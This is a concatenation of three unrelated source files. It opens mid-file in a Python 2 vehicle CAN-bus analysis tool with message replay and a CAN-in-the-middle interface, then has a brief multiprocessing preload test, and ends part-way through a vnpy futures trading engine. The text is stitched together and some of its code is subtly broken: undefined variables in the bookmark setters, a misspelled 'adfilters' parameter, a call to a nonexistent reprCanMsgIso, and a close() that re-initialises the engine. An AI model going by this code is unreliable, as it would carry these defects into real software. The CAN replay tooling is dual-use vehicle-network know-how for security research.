diff.append("TS_delta: %.3f" % delta_ts)
if pretty:
if delta_ts >= .95:
yield ('')
msgrepr = self._reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff))
# allow _reprCanMsg to return None to skip printing the message
if msgrepr != DONT_PRINT_THIS_MESSAGE:
yield msgrepr
last_ts = ts
last_msg = msg
if viewbits & VIEW_ENDSUM:
yield ("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
def reprCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
out = [x for x in self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, tail, viewbits)]
return "\n".join(out)
def _reprCanMsg(self, idx, ts, arbid, msg, comment=None):
return reprCanMsg(idx, ts, arbid, msg, comment=comment)
def printCanSessions(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIds()
else:
arbids = [arbdata for arbdata in self.getArbitrationIds() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print self.reprCanMsgs(arbids=[arbid], advfilters=advfilters)
cmd = raw_input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, Q)uit: ").upper()
while len(cmd) and cmd != 'N':
if cmd == 'R':
self.CANreplay(arbids=[arbid], timing=TIMING_REAL)
elif cmd == 'F':
self.CANreplay(arbids=[arbid], timing=TIMING_FAST)
elif cmd == 'I':
self.CANreplay(arbids=[arbid], timing=TIMING_INTERACTIVE)
elif cmd == 'Q':
return
cmd = raw_input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, Q)uit: ").upper()
print
def printBookmarks(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarks())
def printAsciiStrings(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgs():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print reprCanMsg(idx, ts, arbid, msg, repr(msg))
def reprBookmarks(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks)):
out.append(self.reprBookmark(bid))
return '\n'.join(out)
def reprBookmark(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks[bid]
info = self.bookmark_info.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s \tcomment: %s" % (bid, msgidx, info.get('name'), info.get('comment'))
def setMaskAndFilter(self,
mask0=0,
mask1=0,
filter0=0,
filter1=0,
filter2=0,
filter3=0,
filter4=0,
filter5=0):
'''
Set the filters and masks. The mask determines which bits matter for the filter following the
below truth table:
_____________________________________________________________________________
| Mask Bit n | Filter Bit n | Arbitration ID bit n | Accept or Reject |
| 0 | X | X | Accept |
| 1 | 0 | 0 | Accept |
| 1 | 0 | 1 | Reject |
| 1 | 1 | 0 | Reject |
| 1 | 1 | 1 | Accept |
-----------------------------------------------------------------------------
There are two RX buffers. mask0 and filters 0 and 1 apply to buffer 0. mask1 and the other four filters
apply to buffer 1.
'''
msg = struct.pack('>IIIIIIII', mask0, mask1, filter0, filter1, filter2, filter3, filter4, filter5)
return self._send(CMD_SET_FILT_MASK, msg)
def clearMaskAndFilter(self):
'''
Clears all masks and filters
'''
msg = struct.pack('>IIIIIIII', 0, 0, 0, 0, 0, 0, 0, 0)
return self._send(CMD_SET_FILT_MASK, msg)
class CanControl(cmd.Cmd):
'''
Command User Interface (as if ipython wasn't enough!)
'''
def __init__(self, serialdev=serialdev, baud=baud):
cmd.Cmd.__init__(self)
self.serialdev = serialdev
self.canbuf = CanBuffer(self.serialdev, self._baud)
def getAscii(msg, minbytes=3):
'''
if strict, every character has to be clean ASCII
otherwise, look for strings of at least minbytes in length
'''
strings = []
ascii_match = 0
ascii_count = 0
startidx = None
for bidx in range(len(msg)):
byte = msg[bidx]
if 0x20 <= ord(byte) < 0x7f:
if startidx == None:
startidx = bidx
ascii_count +=1
else:
# non printable char
# if we reached the magic threshold, package it
if ascii_count >= minbytes:
strings.append(msg[startidx:bidx])
# reset counters
ascii_count = 0
startidx = None
# in case we have a string all the way to the end
if ascii_count >= minbytes:
strings.append(msg[startidx:])
return strings
def hasAscii(msg, minbytes=3, strict=False):
'''
if minbytes == -1, every character has to be clean ASCII
otherwise, look for strings of at least minbytes in length
'''
ascii_match = 0
ascii_count = 0
for byte in msg:
if 0x20 <= ord(byte) < 0x7f:
ascii_count +=1
if ascii_count >= minbytes:
ascii_match = 1
else:
if strict:
return 0
ascii_count = 0
return ascii_match
def reprCanMsg(idx, ts, arbid, data, comment=None):
#TODO: make some repr magic that spits out known ARBID's and other subdata
if comment == None:
comment = ''
return "%.8d %8.3f ID: %.3x, Len: %.2x, Data: %-18s\t%s" % (idx, ts, arbid, len(data), data.encode('hex'), comment)
class FordInterface(CanInterface):
def setCanBaudHSCAN(self):
self.setCanBaud(CAN_500KBPS)
def setCanBaudMSCAN(self):
self.setCanBaud(CAN_125KBPS)
def setCanBaudICAN(self):
self.setCanBaud(CAN_500KBPS)
class GMInterface(CanInterface):
'''
DLC port:
SW-LS-CAN - pin 1 33kbps
MS-CAN - pins 3+ and 11- 95kbps
DW-FT-CAN - pins 1+ and 9- <125kbps
HS-CAN - pins 6+ and 14- 500kbps
'''
def setCanBaudHSCAN(self):
self.setCanBaud(CAN_500KBPS)
def setCanBaudMSCAN(self):
self.setCanBaud(CAN_95KBPS)
def setCanBaudLSCAN(self):
self.setCanBaud(CAN_33KBPS)
class CanInTheMiddleInterface(CanInterface):
def __init__(self, port=serialdev, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None):
'''
CAN in the middle. Allows the user to determine what CAN messages are being
sent by a device by isolating a device from the CAN network and using two
Can shields on one Arduino to relay the CAN messages to each other.
Device<----->Isolation CanCat<----->Arduino<----->Vehicle CanCat<----->Vehicle
CAN SPI | SPI CAN
|
| < Serial
PC
This solves the problem of not being able to determine which device is sending
which CAN message, since CAN messages have no source information and all messages
are broadcast.
The Can shield connected to the device is referred to as the isolation CanCat.
This CanCat should be modified so that the CS SPI pin is connected to D10, rather
than the default of D9. This is accomplished by cutting a trace on the circuit
board and bridging the CS pad to the D10 pad. Seeedstudio has instructions
on their Wiki, but there shield differed slightly from my board. The CanCat
connected to the vehicle is referred to as the vehicle CanCat and should be unmodified.
'''
self.bookmarks_iso = []
self.bookmark_info_iso = {}
CanInterface.__init__(self, port=port, baud=baud, verbose=verbose, cmdhandlers=cmdhandlers, comment=comment, load_filename=load_filename, orig_iface=orig_iface)
if load_filename is None:
self.setCanMode(CMD_CAN_MODE_CITM)
def genCanMsgsIso(self, start=0, stop=None, arbids=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
CAN message generator. takes in start/stop indexes as well as a list
of desired arbids (list). Uses the isolation messages.
'''
messages = self._messages.get(CMD_ISO_RECV, [])
if stop == None:
stop = len(messages)
else:
stop = stop + 1
for idx in xrange(start, stop):
ts, msg = messages[idx]
arbid, data = self._splitCanMsg(msg)
if arbids != None and arbid not in arbids:
# allow filtering of arbids
continue
yield((idx, ts, arbid, data))
def getCanMsgCountIso(self):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
the number of CAN messages we've received on the isolation side session
'''
canmsgs = self._messages.get(CMD_ISO_RECV, [])
return len(canmsgs)
def printSessionStatsByBookmarkIso(self, start=None, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Prints session stats only for messages between two bookmarks
'''
print self.getSessionStatsByBookmarkIso(start, stop)
def printSessionStatsIso(self, start=0, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print self.getSessionStatsIso(start, stop)
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
def getSessionStatsByBookmarkIso(self, start=None, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmarkIso(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop)
else:
stop_msg = self.getCanMsgCountIso()
return self.getSessionStatsIso(start=start_msg, stop=stop_msg)
def getArbitrationIdsIso(self, start=0, stop=None, reverse=False):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgsIso(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
def getSessionStatsIso(self, start=0, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
out = []
arbid_list = self.getArbitrationIdsIso(start=start, stop=stop, reverse=True)
for datalen, arbid, msgs in arbid_list:
last = 0
high = 0
low = 0xffffffff
for ts, data in msgs:
if last == 0:
last = ts
continue
# calculate the high and low
delta = ts - last
if delta > high:
high = delta
if delta < low:
low = delta
# track repeated values (rounded to nearest .001 sec)
last = ts
if datalen > 1:
mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
median = low + (high-low) / 2
else:
low = 0
mean = 0
median = mean
out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
(arbid, datalen, mean, median, high, low))
msg_count = self.getCanMsgCountIso()
out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
return '\n'.join(out)
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_ISO_RECV mailbox.
This also places a bookmark in the normal CAN message
stream.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
mbox = self._messages.get(CMD_ISO_RECV)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks_iso)
self.bookmarks_iso.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info_iso[bkmk_index] = info #should this be msg_index? benefit either way?
CanInterface.placeCanBookmark(self, name=name, comment=comment)
return bkmk_index
def getMsgIndexFromBookmarkIso(self, bkmk_index):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
return self.bookmarks_iso[bkmk_index]
def getBookmarkFromMsgIndexIso(self, msg_index):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
return bkmk_index
def setCanBookmarkNameIso(self, bkmk_index, name):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkCommentIso(self, bkmk_index, comment):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkNameByMsgIndexIso(self, msg_index, name):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkCommentByMsgIndexIso(self, msg_index, comment):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def snapshotCanMessagesIso(self, name=None, comment=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmarkIso("Start_" + name, comment)
raw_input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmarkIso("Stop_" + name, comment)
def filterCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def filterCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Iso means the second CAN bus (M2's and DUE_CAN models have two CAN interfaces)
returns the received CAN messages between indexes "start_msg" and "stop_msg"
but only messages to ID's that *do not* appear in the the baseline indicated
by "start_baseline_msg" and "stop_baseline_msg".
for message indexes, you *will* want to look into the bookmarking subsystem!
'''
self.log("starting filtering messages...")
if stop_baseline_msg != None:
self.log("ignoring arbids from baseline...")
# get a list of baseline arbids
filter_ids = { arbid:1 for ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
}.keys()
else:
filter_ids = None
self.log("filtering messages...")
if type(arbids) != list:
arbids = [arbids]
for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
continue
# advanced filters allow python code to be handed in. if any of the python code snippits result in "False" or 0, skip this message
skip = False
for advf in advfilters:
lcls = self._locals(idx, ts, arbid, msg)
if not eval(advf, lcls):
skip = True
if skip:
continue
yield (idx, ts,arbid,msg)
def printCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
print self.reprCanMsgsByBookmarkIso(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters)
def reprCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
print self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def reprCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], adfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
String representation of a set of CAN Messages.
These can be filtered by start and stop message indexes, as well as
use a baseline (defined by start/stop message indexes),
by a list of "desired" arbids as well as a list of
ignored arbids
Many functions wrap this one.
'''
out = []
if start_msg in self.bookmarks_iso:
bkmk = self.bookmarks_iso.index(start_msg)
out.append("starting from bookmark %d: '%s'" %
(bkmk,
self.bookmark_info_iso[bkmk].get('name'))
)
if stop_msg in self.bookmarks_iso:
bkmk = self.bookmarks_iso.index(stop_msg)
out.append("stoppng at bookmark %d: '%s'" %
(bkmk,
self.bookmark_info_iso[bkmk].get('name'))
)
last_msg = None
next_bkmk = 0
next_bkmk_idx = 0
msg_count = 0
last_ts = None
tot_delta_ts = 0
counted_msgs = 0 # used for calculating averages, excluding outliers
data_delta = None
data_repeat = 0
data_similar = 0
for idx, ts, arbid, msg in self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters):
diff = []
# insert bookmark names/comments in appropriate places
while next_bkmk_idx < len(self.bookmarks_iso) and idx >= self.bookmarks_iso[next_bkmk_idx]:
out.append(self.reprBookmarkIso(next_bkmk_idx))
next_bkmk_idx += 1
msg_count += 1
# check data
byte_cnt_diff = 0
if last_msg != None:
if len(last_msg) == len(msg):
for bidx in range(len(msg)):
if last_msg[bidx] != msg[bidx]:
byte_cnt_diff += 1
if byte_cnt_diff == 0:
diff.append("REPEAT")
data_repeat += 1
elif byte_cnt_diff <=4:
diff.append("Similar")
data_similar += 1
# FIXME: make some better heuristic to identify "out of norm"
# look for ASCII data (4+ consecutive bytes)
if hasAscii(msg):
diff.append("ASCII: %s" % repr(msg))
# calculate timestamp delta and comment if out of whack
if last_ts == None:
last_ts = ts
delta_ts = ts - last_ts
if counted_msgs:
avg_delta_ts = tot_delta_ts / counted_msgs
else:
avg_delta_ts = delta_ts
if abs(delta_ts - avg_delta_ts) <= delta_ts:
tot_delta_ts += delta_ts
counted_msgs += 1
else:
diff.append("TS_delta: %.3f" % delta_ts)
out.append(reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff)))
last_ts = ts
last_msg = msg
out.append("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
return "\n".join(out)
def printCanSessionsIso(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIdsIso()
else:
arbids = [arbdata for arbdata in self.getArbitrationIdsIso() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print self.reprCanMsgsIso(arbids=[arbid], advfilters=advfilters)
raw_input("\nPress Enter to review the next Session...")
print
def printBookmarksIso(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarksIso())
def printAsciiStringsIso(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgsIso():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print reprCanMsgIso(idx, ts, arbid, msg, repr(msg))
def reprBookmarksIso(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks_iso)):
out.append(self.reprBookmarkIso(bid))
return '\n'.join(out)
def reprBookmarkIso(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks_iso[bid]
info = self.bookmark_info_iso.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
self.bookmarks_iso = me.get('bookmarks_iso')
self.bookmark_info_iso = me.get('bookmark_info_iso')
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
What you do with it form there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'bookmarks_iso' : self.bookmarks_iso,
'bookmark_info_iso' : self.bookmark_info_iso,
'comments' : self.comments,
}
return savegame
######### administrative, supporting code ##########
cs = []
def cleanupInteractiveAtExit():
global cs
for c in cs:
try:
c.__del__()
except:
pass
devlocs = [
'/dev/ttyACM0',
'/dev/ttyACM1',
'/dev/ttyACM2',
'/dev/tty.usbmodem1411',
'/dev/tty.usbmodem1421',
'/dev/tty.usbmodem1431',
'/dev/ttyACM0',
]
def getDeviceFile():
for devloc in devlocs:
if os.path.exists(devloc):
return devloc
def interactive(port=None, InterfaceClass=CanInterface, intro='', load_filename=None, can_baud=None):
global c
import atexit
c = InterfaceClass(port=port, load_filename=load_filename)
atexit.register(cleanupInteractiveAtExit)
if load_filename is None:
if can_baud != None:
c.setCanBaud(can_baud)
else:
c.setCanBaud(CAN_500KBPS)
gbls = globals()
lcls = locals()
try:
import IPython.Shell
ipsh = IPython.Shell.IPShell(argv=[''], user_ns=lcls, user_global_ns=gbls)
print intro
ipsh.mainloop(intro)
except ImportError, e:
try:
from IPython.terminal.interactiveshell import TerminalInteractiveShell
ipsh = TerminalInteractiveShell()
ipsh.user_global_ns.update(gbls)
ipsh.user_global_ns.update(lcls)
ipsh.autocall = 2 # don't require parenthesis around *everything*. be smart!
ipsh.mainloop(intro)
except ImportError, e:
try:
from IPython.frontend.terminal.interactiveshell import TerminalInteractiveShell
ipsh = TerminalInteractiveShell()
ipsh.user_global_ns.update(gbls)
ipsh.user_global_ns.update(lcls)
ipsh.autocall = 2 # don't require parenthesis around *everything*. be smart!
ipsh.mainloop(intro)
except ImportError, e:
print e
shell = code.InteractiveConsole(gbls)
shell.interact(intro)
|
mp_preload.py | import multiprocessing as multiprocess
multiprocess.Lock()
def f():
print("ok")
if __name__ == "__main__":
ctx = multiprocess.get_context("forkserver")
modname = "test.mp_preload"
# Make sure it's importable
__import__(modname)
ctx.set_forkserver_preload([modname])
proc = ctx.Process(target=f)
proc.start()
proc.join()
|
engine.py | """"""
import importlib
import os
import traceback
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable
from datetime import datetime, timedelta
from threading import Thread
from queue import Queue
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
OrderRequest,
SubscribeRequest,
HistoryRequest,
LogData,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION
)
from vnpy.trader.constant import (
Direction,
OrderType,
Interval,
Exchange,
Offset,
Status
)
from vnpy.trader.utility import load_json, save_json, extract_vt_symbol, round_to
from vnpy.trader.database import database_manager
from vnpy.trader.rqdata import rqdata_client
from .base import (
APP_NAME,
EVENT_CTA_LOG,
EVENT_CTA_STRATEGY,
EVENT_CTA_STOPORDER,
EngineType,
StopOrder,
StopOrderStatus,
STOPORDER_PREFIX
)
from .template import CtaTemplate
from .converter import OffsetConverter
STOP_STATUS_MAP = {
Status.SUBMITTING: StopOrderStatus.WAITING,
Status.NOTTRADED: StopOrderStatus.WAITING,
Status.PARTTRADED: StopOrderStatus.TRIGGERED,
Status.ALLTRADED: StopOrderStatus.TRIGGERED,
Status.CANCELLED: StopOrderStatus.CANCELLED,
Status.REJECTED: StopOrderStatus.CANCELLED
}
class CtaEngine(BaseEngine):
""""""
engine_type = EngineType.LIVE # live trading engine
setting_filename = "cta_strategy_setting.json"
data_filename = "cta_strategy_data.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(CtaEngine, self).__init__(
main_engine, event_engine, APP_NAME)
self.strategy_setting = {} # strategy_name: dict
self.strategy_data = {} # strategy_name: dict
self.classes = {} # class_name: stategy_class
self.strategies = {} # strategy_name: strategy
self.symbol_strategy_map = defaultdict(
list) # vt_symbol: strategy list
self.orderid_strategy_map = {} # vt_orderid: strategy
self.strategy_orderid_map = defaultdict(
set) # strategy_name: orderid list
self.stop_order_count = 0 # for generating stop_orderid
self.stop_orders = {} # stop_orderid: stop_order
self.init_thread = None
self.init_queue = Queue()
self.rq_client = None
self.rq_symbols = set()
self.vt_tradeids = set() # for filtering duplicate trade
self.offset_converter = OffsetConverter(self.main_engine)
def init_engine(self):
"""
"""
self.init_rqdata()
self.load_strategy_class()
self.load_strategy_setting()
self.load_strategy_data()
self.register_event()
self.write_log("CTA策略引擎初始化成功")
def close(self):
""""""
self.stop_all_strategies()
self.init_engine()
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
def init_rqdata(self):
"""
Init RQData client.
"""
result = rqdata_client.init()
if result:
self.write_log("RQData数据接口初始化成功")
def query_bar_from_rq(
self, symbol: str, exchange: Exchange, interval: Interval, start: datetime, end: datetime
):
"""
Query bar data from RQData.
"""
req = HistoryRequest(
symbol=symbol,
exchange=exchange,
interval=interval,
start=start,
end=end
)
data = rqdata_client.query_history(req)
return data
def process_tick_event(self, event: Event):
""""""
tick = event.data
strategies = self.symbol_strategy_map[tick.vt_symbol]
if not strategies:
return
self.check_stop_order(tick)
for strategy in strategies:
if strategy.inited:
self.call_strategy_func(strategy, strategy.on_tick, tick)
def process_order_event(self, event: Event):
""""""
order = event.data
self.offset_converter.update_order(order)
strategy = self.orderid_strategy_map.get(order.vt_orderid, None)
if not strategy:
return
# Remove vt_orderid if order is no longer active.
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if order.vt_orderid in vt_orderids and not order.is_active():
vt_orderids.remove(order.vt_orderid)
# For server stop order, call strategy on_stop_order function
if order.type == OrderType.STOP:
so = StopOrder(
vt_symbol=order.vt_symbol,
direction=order.direction,
offset=order.offset,
price=order.price,
volume=order.volume,
stop_orderid=order.vt_orderid,
strategy_name=strategy.strategy_name,
status=STOP_STATUS_MAP[order.status],
vt_orderids=[order.vt_orderid],
)
self.call_strategy_func(strategy, strategy.on_stop_order, so)
# Call strategy on_order function
self.call_strategy_func(strategy, strategy.on_order, order)
def process_trade_event(self, event: Event):
""""""
trade = event.data
# Filter duplicate trade push
if trade.vt_tradeid in self.vt_tradeids:
return
self.vt_tradeids.add(trade.vt_tradeid)
self.offset_converter.update_trade(trade)
strategy = self.orderid_strategy_map.get(trade.vt_orderid, None)
if not strategy:
return
# Update strategy pos before calling on_trade method
if trade.direction == Direction.LONG:
strategy.pos += trade.volume
else:
strategy.pos -= trade.volume
self.call_strategy_func(strategy, strategy.on_trade, trade)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def process_position_event(self, event: Event):
""""""
position = event.data
self.offset_converter.update_position(position)
def check_stop_order(self, tick: TickData):
""""""
for stop_order in list(self.stop_orders.values()):
if stop_order.vt_symbol != tick.vt_symbol:
continue
long_triggered = (
stop_order.direction == Direction.LONG and tick.last_price >= stop_order.price
)
short_triggered = (
stop_order.direction == Direction.SHORT and tick.last_price <= stop_order.price
)
if long_triggered or short_triggered:
strategy = self.strategies[stop_order.strategy_name]
# To get excuted immediately after stop order is
# triggered, use limit price if available, otherwise
# use ask_price_5 or bid_price_5
if stop_order.direction == Direction.LONG:
if tick.limit_up:
price = tick.limit_up
else:
price = tick.ask_price_5
else:
if tick.limit_down:
price = tick.limit_down
else:
price = tick.bid_price_5
contract = self.main_engine.get_contract(stop_order.vt_symbol)
vt_orderids = self.send_limit_order(
strategy,
contract,
stop_order.direction,
stop_order.offset,
price,
stop_order.volume,
stop_order.lock
)
# Update stop order status if placed successfully
if vt_orderids:
# Remove from relation map.
self.stop_orders.pop(stop_order.stop_orderid)
strategy_vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if stop_order.stop_orderid in strategy_vt_orderids:
strategy_vt_orderids.remove(stop_order.stop_orderid)
# Change stop order status to cancelled and update to strategy.
stop_order.status = StopOrderStatus.TRIGGERED
stop_order.vt_orderids = vt_orderids
self.call_strategy_func(
strategy, strategy.on_stop_order, stop_order
)
self.put_stop_order_event(stop_order)
def send_server_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
type: OrderType,
lock: bool
):
"""
Send a new order to server.
"""
# Create request and send order.
original_req = OrderRequest(
symbol=contract.symbol,
exchange=contract.exchange,
direction=direction,
offset=offset,
type=type,
price=price,
volume=volume,
)
# Convert with offset converter
req_list = self.offset_converter.convert_order_request(original_req, lock)
# Send Orders
vt_orderids = []
for req in req_list:
vt_orderid = self.main_engine.send_order(
req, contract.gateway_name)
vt_orderids.append(vt_orderid)
